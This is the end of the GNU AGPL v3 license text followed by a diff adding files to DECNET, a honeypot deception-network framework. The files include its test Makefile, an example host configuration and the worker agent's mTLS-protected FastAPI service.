 violation by some reasonable means, this is the first time you have
 received notice of violation of this License (for any work) from that
 copyright holder, and you cure the violation prior to 30 days after
 your receipt of the notice.
  Termination of your rights under this section does not terminate the
 licenses of parties who have received copies or rights from you under
 this License.  If your rights have been terminated and not permanently
 reinstated, you do not qualify to receive new licenses for the same
 material under section 10.
  9. Acceptance Not Required for Having Copies.
  You are not required to accept this License in order to receive or
 run a copy of the Program.  Ancillary propagation of a covered work
 occurring solely as a consequence of using peer-to-peer transmission
 to receive a copy likewise does not require acceptance.  However,
 nothing other than this License grants you permission to propagate or
 modify any covered work.  These actions infringe copyright if you do
 not accept this License.  Therefore, by modifying or propagating a
 covered work, you indicate your acceptance of this License to do so.
  10. Automatic Licensing of Downstream Recipients.
  Each time you convey a covered work, the recipient automatically
 receives a license from the original licensors, to run, modify and
 propagate that work, subject to this License.  You are not responsible
 for enforcing compliance by third parties with this License.
  An "entity transaction" is a transaction transferring control of an
 organization, or substantially all assets of one, or subdividing an
 organization, or merging organizations.  If propagation of a covered
 work results from an entity transaction, each party to that
 transaction who receives a copy of the work also receives whatever
 licenses to the work the party's predecessor in interest had or could
 give under the previous paragraph, plus a right to possession of the
 Corresponding Source of the work from the predecessor in interest, if
 the predecessor has it or can get it with reasonable efforts.
  You may not impose any further restrictions on the exercise of the
 rights granted or affirmed under this License.  For example, you may
 not impose a license fee, royalty, or other charge for exercise of
 rights granted under this License, and you may not initiate litigation
 (including a cross-claim or counterclaim in a lawsuit) alleging that
 any patent claim is infringed by making, using, selling, offering for
 sale, or importing the Program or any portion of it.
  11. Patents.
  A "contributor" is a copyright holder who authorizes use under this
 License of the Program or a work on which the Program is based.  The
 work thus licensed is called the contributor's "contributor version".
  A contributor's "essential patent claims" are all patent claims
 owned or controlled by the contributor, whether already acquired or
 hereafter acquired, that would be infringed by some manner, permitted
 by this License, of making, using, or selling its contributor version,
 but do not include claims that would be infringed only as a
 consequence of further modification of the contributor version.  For
 purposes of this definition, "control" includes the right to grant
 patent sublicenses in a manner consistent with the requirements of
 this License.
  Each contributor grants you a non-exclusive, worldwide, royalty-free
 patent license under the contributor's essential patent claims, to
 make, use, sell, offer for sale, import and otherwise run, modify and
 propagate the contents of its contributor version.
  In the following three paragraphs, a "patent license" is any express
 agreement or commitment, however denominated, not to enforce a patent
 (such as an express permission to practice a patent or covenant not to
 sue for patent infringement).  To "grant" such a patent license to a
 party means to make such an agreement or commitment not to enforce a
 patent against the party.
  If you convey a covered work, knowingly relying on a patent license,
 and the Corresponding Source of the work is not available for anyone
 to copy, free of charge and under the terms of this License, through a
 publicly available network server or other readily accessible means,
 then you must either (1) cause the Corresponding Source to be so
 available, or (2) arrange to deprive yourself of the benefit of the
 patent license for this particular work, or (3) arrange, in a manner
 consistent with the requirements of this License, to extend the patent
 license to downstream recipients.  "Knowingly relying" means you have
 actual knowledge that, but for the patent license, your conveying the
 covered work in a country, or your recipient's use of the covered work
 in a country, would infringe one or more identifiable patents in that
 country that you have reason to believe are valid.
  If, pursuant to or in connection with a single transaction or
 arrangement, you convey, or propagate by procuring conveyance of, a
 covered work, and grant a patent license to some of the parties
 receiving the covered work authorizing them to use, propagate, modify
 or convey a specific copy of the covered work, then the patent license
 you grant is automatically extended to all recipients of the covered
 work and works based on it.
  A patent license is "discriminatory" if it does not include within
 the scope of its coverage, prohibits the exercise of, or is
 conditioned on the non-exercise of one or more of the rights that are
 specifically granted under this License.  You may not convey a covered
 work if you are a party to an arrangement with a third party that is
 in the business of distributing software, under which you make payment
 to the third party based on the extent of your activity of conveying
 the work, and under which the third party grants, to any of the
 parties who would receive the covered work from you, a discriminatory
 patent license (a) in connection with copies of the covered work
 conveyed by you (or copies made from those copies), or (b) primarily
 for and in connection with specific products or compilations that
 contain the covered work, unless you entered into that arrangement,
 or that patent license was granted, prior to 28 March 2007.
  Nothing in this License shall be construed as excluding or limiting
 any implied license or other defenses to infringement that may
 otherwise be available to you under applicable patent law.
  12. No Surrender of Others' Freedom.
  If conditions are imposed on you (whether by court order, agreement or
 otherwise) that contradict the conditions of this License, they do not
 excuse you from the conditions of this License.  If you cannot convey a
 covered work so as to satisfy simultaneously your obligations under this
 License and any other pertinent obligations, then as a consequence you may
 not convey it at all.  For example, if you agree to terms that obligate you
 to collect a royalty for further conveying from those to whom you convey
 the Program, the only way you could satisfy both those terms and this
 License would be to refrain entirely from conveying the Program.
  13. Remote Network Interaction; Use with the GNU General Public License.
  Notwithstanding any other provision of this License, if you modify the
 Program, your modified version must prominently offer all users
 interacting with it remotely through a computer network (if your version
 supports such interaction) an opportunity to receive the Corresponding
 Source of your version by providing access to the Corresponding Source
 from a network server at no charge, through some standard or customary
 means of facilitating copying of software.  This Corresponding Source
 shall include the Corresponding Source for any work covered by version 3
 of the GNU General Public License that is incorporated pursuant to the
 following paragraph.
  Notwithstanding any other provision of this License, you have
 permission to link or combine any covered work with a work licensed
 under version 3 of the GNU General Public License into a single
 combined work, and to convey the resulting work.  The terms of this
 License will continue to apply to the part which is the covered work,
 but the work with which it is combined will remain governed by version
 3 of the GNU General Public License.
  14. Revised Versions of this License.
  The Free Software Foundation may publish revised and/or new versions of
 the GNU Affero General Public License from time to time.  Such new versions
 will be similar in spirit to the present version, but may differ in detail to
 address new problems or concerns.
  Each version is given a distinguishing version number.  If the
 Program specifies that a certain numbered version of the GNU Affero General
 Public License "or any later version" applies to it, you have the
 option of following the terms and conditions either of that numbered
 version or of any later version published by the Free Software
 Foundation.  If the Program does not specify a version number of the
 GNU Affero General Public License, you may choose any version ever published
 by the Free Software Foundation.
  If the Program specifies that a proxy can decide which future
 versions of the GNU Affero General Public License can be used, that proxy's
 public statement of acceptance of a version permanently authorizes you
 to choose that version for the Program.
  Later license versions may give you additional or different
 permissions.  However, no additional obligations are imposed on any
 author or copyright holder as a result of your choosing to follow a
 later version.
  15. Disclaimer of Warranty.
  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
 APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
 HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
 OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
 THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
 PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
 IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
 ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
  16. Limitation of Liability.
  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
 WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
 THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
 GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
 USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
 DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
 PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
 EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
 SUCH DAMAGES.
  17. Interpretation of Sections 15 and 16.
  If the disclaimer of warranty and limitation of liability provided
 above cannot be given local legal effect according to their terms,
 reviewing courts shall apply local law that most closely approximates
 an absolute waiver of all civil liability in connection with the
 Program, unless a warranty or assumption of liability accompanies a
 copy of the Program in return for a fee.
                     END OF TERMS AND CONDITIONS
            How to Apply These Terms to Your New Programs
  If you develop a new program, and you want it to be of the greatest
 possible use to the public, the best way to achieve this is to make it
 free software which everyone can redistribute and change under these terms.
  To do so, attach the following notices to the program.  It is safest
 to attach them to the start of each source file to most effectively
 state the exclusion of warranty; and each file should have at least
 the "copyright" line and a pointer to where the full notice is found.
    <one line to give the program's name and a brief idea of what it does.>
    Copyright (C) <year>  <name of author>
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU Affero General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU Affero General Public License for more details.
    You should have received a copy of the GNU Affero General Public License
    along with this program.  If not, see <https://www.gnu.org/licenses/>.
 Also add information on how to contact you by electronic and paper mail.
  If your software can interact with users remotely through a computer
 network, you should also make sure that it provides a way for users to
 get its source.  For example, if your program is a web application, its
 interface could display a "Source" link that leads users to an archive
 of the code.  There are many ways you could offer source, and different
 solutions will be better for different programs; see section 13 for the
 specific requirements.
  You should also get your employer (if you work as a programmer) or school,
 if any, to sign a "copyright disclaimer" for the program, if necessary.
 For more information on this, and how to apply and follow the GNU AGPL, see
 <https://www.gnu.org/licenses/>.
--- a/261
+++ b/261
@@ -0,0 +1,261 @@
 PYTEST     := .311/bin/pytest
 FAIL_FAST  ?= 1
 NO_CACHE   ?= 0
 ARGS       :=
 # addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
 # Unit suites inherit that; special suites clear it with --override-ini.
 UNIT_FLAGS  := --timeout=30 --timeout-method=thread
 SEQ_FLAGS   := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
 FUZZ_FLAGS  := --override-ini="addopts=-v -x" -n logical -m fuzz \
 	--ignore=tests/api/test_schemathesis.py \
 	--ignore=tests/api/test_schemathesis_agent.py \
 	--ignore=tests/api/test_schemathesis_swarm.py \
 	--ignore=tests/api/test_schemathesis_ttp.py
 SCHEMA_QUICK ?= 0
 SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
 BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
 # ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
 .PHONY: test-core
 test-core:
 	$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-web
 test-web:
 	$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-db
 test-db:
 	$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-bus
 test-bus:
 	$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-ttp
 test-ttp:
 	$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-intel
 test-intel:
 	$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-analysis
 test-analysis:
 	$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-infra
 test-infra:
 	$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-fleet
 test-fleet:
 	$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-cli
 test-cli:
 	$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-features
 test-features:
 	$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
 # ── Go and React suites ───────────────────────────────────────────────────────
 _GO_MODULES := \
 	decnet/templates/_caddy_modules/decnetfp \
 	decnet/templates/http/_caddy_modules/decnetfp \
 	decnet/templates/https/_caddy_modules/decnetfp
 .PHONY: test-go
 test-go:
 	@failed=""; \
 	for mod in $(_GO_MODULES); do \
 		echo "=== go test: $$mod ==="; \
 		if (cd "$$mod" && go test ./...); then \
 			echo "[PASS] $$mod"; \
 		else \
 			echo "[FAIL] $$mod"; \
 			failed="$$failed $$mod"; \
 			if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
 		fi; \
 	done; \
 	[ -z "$$failed" ]
 .PHONY: test-react
 test-react:
 	cd decnet_web && npm run test:run $(ARGS)
 # ── Special suites (sequential, longer timeout) ───────────────────────────────
 .PHONY: test-live
 test-live:
 	$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
 .PHONY: test-api
 test-api:
 	$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
 .PHONY: test-stress
 test-stress:
 	$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
 .PHONY: test-service
 test-service:
 	$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
 .PHONY: test-fuzz
 test-fuzz:
 	$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
 .PHONY: test-schema
 test-schema:
 	SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
 		tests/api/test_schemathesis.py \
 		tests/api/test_schemathesis_agent.py \
 		tests/api/test_schemathesis_swarm.py \
 		tests/api/test_schemathesis_ttp.py \
 		$(SCHEMA_FLAGS) $(ARGS)
 .PHONY: test-bench
 test-bench:
 	$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
 .PHONY: test-docker
 test-docker:
 	DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
 # ── Static analysis ───────────────────────────────────────────────────────────
 .PHONY: test-mypy
 test-mypy:
 	.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
 .PHONY: test-bandit
 test-bandit:
 	.311/bin/bandit -r decnet -c pyproject.toml
 .PHONY: test-vulture
 test-vulture:
 	.311/bin/vulture decnet --min-confidence 80
 .PHONY: test-pip-audit
 test-pip-audit:
 	.311/bin/pip-audit
 # ── Composite: all suites ─────────────────────────────────────────────────────
 _ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
               go react \
               live api schema stress service fuzz bench docker \
               mypy bandit vulture pip-audit
 .PHONY: test-all test
 test-all test:
 	@failed=""; \
 	for suite in $(_ALL_SUITES); do \
 		echo ""; \
 		echo "══════════════════════════ $$suite ══════════════════════════"; \
 		if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
 			echo "[PASS] $$suite"; \
 		else \
 			echo "[FAIL] $$suite"; \
 			failed="$$failed $$suite"; \
 			if [ "$(FAIL_FAST)" = "1" ]; then \
 				echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
 				exit 1; \
 			fi; \
 		fi; \
 	done; \
 	if [ -n "$$failed" ]; then \
 		echo ""; \
 		echo "Failed:$$failed"; \
 		exit 1; \
 	fi; \
 	echo ""; \
 	echo "All suites passed."
 # ── Decky image pre-build ─────────────────────────────────────────────────────
 _DECKY_TEMPLATES := \
 	conpot docker_api elasticsearch ftp http https imap k8s ldap \
 	llmnr mongodb mqtt mssql mysql pop3 postgres rdp redis sip smb smtp \
 	sniffer snmp ssh telnet tftp vnc
 .PHONY: build-all
 build-all:
 	@failed=""; \
 	for svc in $(_DECKY_TEMPLATES); do \
 		echo ""; \
 		echo "══════════════════════════ $$svc ══════════════════════════"; \
 		_nc=""; \
 		if [ "$(NO_CACHE)" = "1" ]; then _nc="--no-cache"; fi; \
 		if DOCKER_BUILDKIT=1 docker build $$_nc \
 				-t decnet/$$svc:latest \
 				decnet/templates/$$svc; then \
 			echo "[BUILT] $$svc"; \
 		else \
 			echo "[FAIL] $$svc"; \
 			failed="$$failed $$svc"; \
 			if [ "$(FAIL_FAST)" = "1" ]; then \
 				echo "Stopping at first failure. Use FAIL_FAST=0 to build all."; \
 				exit 1; \
 			fi; \
 		fi; \
 	done; \
 	if [ -n "$$failed" ]; then \
 		echo ""; \
 		echo "Failed:$$failed"; \
 		exit 1; \
 	fi; \
 	echo ""; \
 	echo "All decky images built."
 .PHONY: help
 help:
 	@echo "Unit suites (xdist, 30s timeout):"
 	@echo "  make test-core      tests/core + config + factories + fixtures"
 	@echo "  make test-web       tests/web + services"
 	@echo "  make test-db        tests/db + vectorstore"
 	@echo "  make test-bus       tests/bus + logging + telemetry"
 	@echo "  make test-ttp       tests/ttp"
 	@echo "  make test-intel     tests/intel + asn + geoip"
 	@echo "  make test-analysis  tests/clustering + correlation"
 	@echo "  make test-infra     tests/agent + collector + sniffer + profiler"
 	@echo "  make test-fleet     tests/fleet + swarm + topology + orchestrator + deploy + updater"
 	@echo "  make test-cli       tests/cli + engine + mutator + realism"
 	@echo "  make test-features  tests/canary + artifacts + webhook + decky_io + prober"
 	@echo ""
 	@echo "Go / React suites:"
 	@echo "  make test-go        go test ./... in each Caddy module variant"
 	@echo "  make test-react     vitest run in decnet_web"
 	@echo ""
 	@echo "Special suites (sequential, 120s timeout):"
 	@echo "  make test-live      tests/live"
 	@echo "  make test-api       tests/api  (schemathesis)"
 	@echo "  make test-stress    tests/stress"
 	@echo "  make test-service   tests/service_testing"
 	@echo "  make test-schema              schemathesis contract tests (-m fuzz, xdist logical)"
 	@echo "  make test-schema SCHEMA_QUICK=1   same, capped at 100 examples per test"
 	@echo "  make test-fuzz      hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
 	@echo "  make test-bench     tests/perf"
 	@echo "  make test-docker    tests/docker  (needs DECNET_LIVE_DOCKER=1)"
 	@echo ""
 	@echo "Static analysis:"
 	@echo "  make test-mypy      mypy type check on decnet/"
 	@echo "  make test-bandit    bandit security scan on decnet/"
 	@echo "  make test-vulture   vulture dead code scan (>=80% confidence)"
 	@echo "  make test-pip-audit pip-audit dependency vulnerability scan"
 	@echo ""
 	@echo "Composites:"
 	@echo "  make test-all       ALL suites (unit + go + react + live + api + schema + fuzz + bench + stress + docker + static analysis)"
 	@echo "  make test-all FAIL_FAST=0   same, report all failures instead of stopping"
 	@echo ""
 	@echo "Passthrough: make test-web ARGS='--lf -s'"
 	@echo ""
 	@echo "Decky images:"
 	@echo "  make build-all              build decnet/<svc>:latest for all 27 decky templates"
 	@echo "  make build-all NO_CACHE=1   same, bypassing Docker layer cache"
 	@echo "  make build-all FAIL_FAST=0  same, continue past failures"
--- a/README.md
+++ b/README.md
--- a/bait/.gitkeep
+++ b/bait/.gitkeep
--- a/bait/README.md
+++ b/bait/README.md
@@ -0,0 +1,5 @@
 # bait/
 Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
 JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.
--- a/decnet.collector.log
+++ b/decnet.collector.log
@@ -1 +0,0 @@
 Collector starting → /home/anti/Tools/DECNET/decnet.log
--- a/decnet.ini.example
+++ b/decnet.ini.example
@@ -0,0 +1,64 @@
 ; /etc/decnet/decnet.ini — DECNET host configuration
 ;
 ; Copy to /etc/decnet/decnet.ini and edit. Values here seed os.environ at
 ; CLI startup via setdefault() — real env vars still win, so you can
 ; override any value on the shell without editing this file.
 ;
 ; A missing file is fine; every daemon has sensible defaults. The main
 ; reason to use this file is to skip typing the same flags on every
 ; `decnet` invocation and to pin a host's role via `mode`.
 [decnet]
 ; mode = agent | master
 ;   agent  — worker host (runs `decnet agent`, `decnet forwarder`, `decnet updater`).
 ;            Master-only commands (api, swarmctl, swarm, deploy, teardown, ...)
 ;            are hidden from `decnet --help` and refuse to run.
 ;   master — central server (runs `decnet api`, `decnet web`, `decnet swarmctl`,
 ;            `decnet listener`). All commands visible.
 mode = agent
 ; disallow-master = true (default when mode=agent)
 ; Set to false for hybrid dev hosts that legitimately run both roles.
 disallow-master = true
 ; log-directory — root for DECNET's per-component logs. Systemd units set
 ; DECNET_SYSTEM_LOGS=<log-directory>/decnet.<component>.log so agent, forwarder,
 ; and engine each get their own file. The forwarder tails decnet.log.
 log-directory = /var/log/decnet
 ; ─── Agent-only settings (read when mode=agent) ───────────────────────────
 [agent]
 ; Where the master's syslog-TLS listener lives. DECNET_SWARM_MASTER_HOST.
 master-host = 192.168.1.50
 ; Master listener port (RFC 5425 default 6514). DECNET_SWARM_SYSLOG_PORT.
 swarm-syslog-port = 6514
 ; Bind address/port for this worker's agent API (mTLS).
 agent-port = 8765
 ; Cert bundle dir — must contain ca.crt, worker.crt, worker.key from enroll.
 ; DECNET_AGENT_DIR — honored by the forwarder child as well.
 agent-dir = /home/anti/.decnet/agent
 ; Updater cert bundle (required for `decnet updater`).
 updater-dir = /home/anti/.decnet/updater
 ; ─── Master-only settings (read when mode=master) ─────────────────────────
 [master]
 ; Main API (REST for the React dashboard). DECNET_API_HOST / _PORT.
 api-host = 0.0.0.0
 api-port = 8000
 ; React dev-server dashboard (`decnet web`). DECNET_WEB_HOST / _PORT.
 web-host = 0.0.0.0
 web-port = 8080
 ; Swarm controller (master-internal). DECNET_SWARMCTL_HOST isn't exposed
 ; under that name today — this block is the forward-compatible spelling.
 ; swarmctl-host = 127.0.0.1
 ; swarmctl-port = 8770
 ; Syslog-over-TLS listener bind address and port. DECNET_LISTENER_HOST and
 ; DECNET_SWARM_SYSLOG_PORT. The listener is auto-spawned by `decnet swarmctl`.
 listener-host = 0.0.0.0
 swarm-syslog-port = 6514
 ; Master CA dir (for enroll / swarm cert issuance).
 ; ca-dir = /home/anti/.decnet/ca
 ; JWT secret for the web API. MUST be set; 32+ bytes. Keep out of git.
 ; jwt-secret = REPLACE_ME_WITH_A_32_BYTE_SECRET
--- a/decnet.tar
+++ b/decnet.tar
--- a/decnet/init.py
+++ b/decnet/init.py
@@ -0,0 +1,13 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """DECNET — honeypot deception-network framework.
 This __init__ runs once, on the first `import decnet.*`. It seeds
 os.environ from /etc/decnet/decnet.ini (if present) so that later
 module-level reads in decnet.env pick up the INI values as if they had
 been exported by the shell. Real env vars always win via setdefault().
 Kept minimal on purpose — any heavier work belongs in a submodule.
 """
 from decnet.config_ini import load_ini_config as _load_ini_config
 _load_ini_config()
--- a/decnet/agent/init.py
+++ b/decnet/agent/init.py
@@ -0,0 +1,8 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """DECNET worker agent — runs on every SWARM worker host.
 Exposes an mTLS-protected FastAPI service the master's SWARM controller
 calls to deploy, mutate, and tear down deckies locally.  The agent reuses
 the existing `decnet.engine.deployer` code path unchanged, so a worker runs
 deckies the same way `decnet deploy --mode unihost` does today.
 """
--- a/decnet/agent/app.py
+++ b/decnet/agent/app.py
@@ -0,0 +1,366 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Worker-side FastAPI app.
 Protected by mTLS at the ASGI/uvicorn transport layer: uvicorn is started
 with ``--ssl-ca-certs`` + ``--ssl-cert-reqs 2`` (CERT_REQUIRED), so any
 client that cannot prove a cert signed by the DECNET CA is rejected before
 reaching a handler.  Once past the TLS handshake, all peers are trusted
 equally (the only entity holding a CA-signed cert is the master
 controller).
 Endpoints mirror the existing unihost CLI verbs:
 * ``POST /deploy``   — body: serialized ``DecnetConfig``
 * ``POST /teardown`` — body: optional ``{"decky_id": "..."}``
 * ``POST /mutate``   — body: ``{"decky_id": "...", "services": [...]}``
 * ``GET  /status``   — deployment snapshot
 * ``GET  /health``   — liveness probe, does NOT require mTLS? No — mTLS
  still required; master pings it with its cert.
 """
 from __future__ import annotations
 import asyncio
 import os
 import pathlib
 from contextlib import asynccontextmanager
 from typing import Any, Optional
 from fastapi import FastAPI, HTTPException
 from fastapi.responses import JSONResponse
 from pydantic import BaseModel, Field
 import contextlib
 from decnet.agent import executor as _exec
 from decnet.agent import heartbeat as _heartbeat
 from decnet.agent import topology_ops as _topology_ops
 from decnet.bus.factory import get_bus
 from decnet.bus.publish import run_health_heartbeat
 from decnet.swarm.pki import DEFAULT_AGENT_DIR
 from decnet.agent.topology_store import AlreadyApplied, TopologyStore
 from decnet.config import DecnetConfig
 from decnet.logging import get_logger
 from decnet.topology.validate import ValidationError
 log = get_logger("agent.app")
 def _resolve_agent_dir() -> pathlib.Path:
    env = os.environ.get("DECNET_AGENT_DIR")
    if env:
        return pathlib.Path(env)
    system = pathlib.Path("/etc/decnet/agent")
    if system.exists():
        return system
    return DEFAULT_AGENT_DIR
 # Module-level singleton.  Created lazily on first use so tests can
 # monkeypatch DECNET_AGENT_DIR before the store binds to a path.
 _topology_store: Optional[TopologyStore] = None
 def _store() -> TopologyStore:
    global _topology_store
    if _topology_store is None:
        _topology_store = TopologyStore(_resolve_agent_dir() / "topology.db")
    return _topology_store
 _collector_task: Optional[asyncio.Task] = None
 def _ensure_collector_started() -> None:
    """Spawn the log collector on demand — called from /topology/apply
    after a successful materialise.  We must NOT start this in the
    lifespan hook: the agent's boot invariant is "never touch docker
    until master tells us to" (see tests/swarm/test_agent_no_auto_restore.py).
    The collector watches ``decnet.topology.service=true`` labels via
    docker events, writing RFC 5424 lines to ``DECNET_AGENT_LOG_FILE``
    which the forwarder ships to the master over syslog-TLS.  Idempotent:
    subsequent calls while the task is still running are no-ops.
    """
    global _collector_task
    if _collector_task is not None and not _collector_task.done():
        return
    from decnet.env import DECNET_AGENT_LOG_FILE
    try:
        from decnet.collector.worker import log_collector_worker
    except Exception:  # noqa: BLE001 — docker may be unavailable on dev
        log.warning(
            "agent log collector not starting — collector worker import failed",
            exc_info=True,
        )
        return
    _collector_task = asyncio.create_task(
        log_collector_worker(DECNET_AGENT_LOG_FILE),
        name="agent-log-collector",
    )
    log.info("agent log collector started log_file=%s", DECNET_AGENT_LOG_FILE)
 _bus_heartbeat_task: Optional[asyncio.Task] = None
@asynccontextmanager
 async def _lifespan(app: FastAPI):
    # Best-effort: if identity/bundle plumbing isn't configured (e.g. dev
    # runs or non-enrolled hosts), heartbeat.start() is a silent no-op.
    _heartbeat.start()
    # Host-local bus heartbeat (system.agent.health).  Separate channel
    # from the mTLS master-facing heartbeat above; this one lets peers on
    # the same host (dashboard, updater) see the agent is alive without
    # hitting its HTTPS endpoint.  Bus-disabled path is a no-op loop.
    bus = None
    try:
        bus = get_bus(client_name="agent")
        await bus.connect()
    except Exception as exc:  # noqa: BLE001
        log.warning("agent: bus unavailable, skipping health heartbeat: %s", exc)
        bus = None
    global _bus_heartbeat_task
    _bus_heartbeat_task = asyncio.create_task(
        run_health_heartbeat(bus, "agent"),
        name="agent-bus-heartbeat",
    )
    try:
        yield
    finally:
        await _heartbeat.stop()
        if _bus_heartbeat_task is not None:
            _bus_heartbeat_task.cancel()
            with contextlib.suppress(asyncio.CancelledError, Exception):
                await _bus_heartbeat_task
            _bus_heartbeat_task = None
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
        global _collector_task
        if _collector_task is not None and not _collector_task.done():
            _collector_task.cancel()
            try:
                await _collector_task
            except (asyncio.CancelledError, Exception):  # noqa: BLE001
                pass
        _collector_task = None
        global _topology_store
        if _topology_store is not None:
            _topology_store.close()
            _topology_store = None
 app = FastAPI(
    title="DECNET SWARM Agent",
    version="0.1.0",
    docs_url=None,    # no interactive docs on worker — narrow attack surface
    redoc_url=None,
    openapi_url=None,
    lifespan=_lifespan,
    responses={
        400: {"description": "Malformed request body"},
        500: {"description": "Executor error"},
    },
 )
 # ------------------------------------------------------------------ schemas
 class DeployRequest(BaseModel):
    config: DecnetConfig = Field(..., description="Full DecnetConfig to materialise on this worker")
    dry_run: bool = False
    no_cache: bool = False
 class TeardownRequest(BaseModel):
    decky_id: Optional[str] = None
 class MutateRequest(BaseModel):
    decky_id: str
    services: list[str]
    dry_run: bool = False
 # ------------------------------------------------------------------ routes
@app.get("/health")
 async def health() -> dict[str, str]:
    return {"status": "ok"}
@app.get("/status")
 async def status() -> dict:
    return await _exec.status()
@app.post(
    "/deploy",
    status_code=202,
    responses={202: {"description": "Deploy accepted; runs in background; lifecycle deltas pushed via heartbeat"}},
 )
 async def deploy(req: DeployRequest) -> dict:
    """Spawn the deploy in the background and return 202 immediately.
    The master tracks per-decky completion via lifecycle deltas pushed on
    the next heartbeat (one immediate push on completion, plus the
    scheduled 30 s ticks as a fallback).  Holding the request open across
    a multi-minute compose build was the previous source of the wizard
    API-hang."""
    asyncio.create_task(
        _exec.deploy_async(req.config, dry_run=req.dry_run, no_cache=req.no_cache),
        name=f"deploy-{id(req)}",
    )
    return {"status": "accepted", "deckies": [d.name for d in req.config.deckies]}
@app.post(
    "/teardown",
    responses={500: {"description": "Teardown raised an exception"}},
 )
 async def teardown(req: TeardownRequest) -> dict:
    try:
        await _exec.teardown(req.decky_id)
    except Exception as exc:
        log.exception("agent.teardown failed")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    return {"status": "torn_down", "decky_id": req.decky_id}
@app.post(
    "/self-destruct",
    responses={500: {"description": "Reaper could not be scheduled"}},
 )
 async def self_destruct() -> dict:
    """Stop all DECNET services on this worker and delete the install
    footprint. Called by the master during decommission. Logs under
    /var/log/decnet* are preserved. Fire-and-forget — returns 202 before
    the reaper starts deleting files."""
    try:
        await _exec.self_destruct()
    except Exception as exc:
        log.exception("agent.self_destruct failed")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    return {"status": "self_destruct_scheduled"}
 # ------------------------------------------------------- topology endpoints
 class ApplyTopologyRequest(BaseModel):
    hydrated: dict[str, Any] = Field(
        ..., description="Hydrated topology dict from master.persistence.hydrate()"
    )
    version_hash: str = Field(
        ..., description="Master's canonical_hash(hydrated); must match ours"
    )
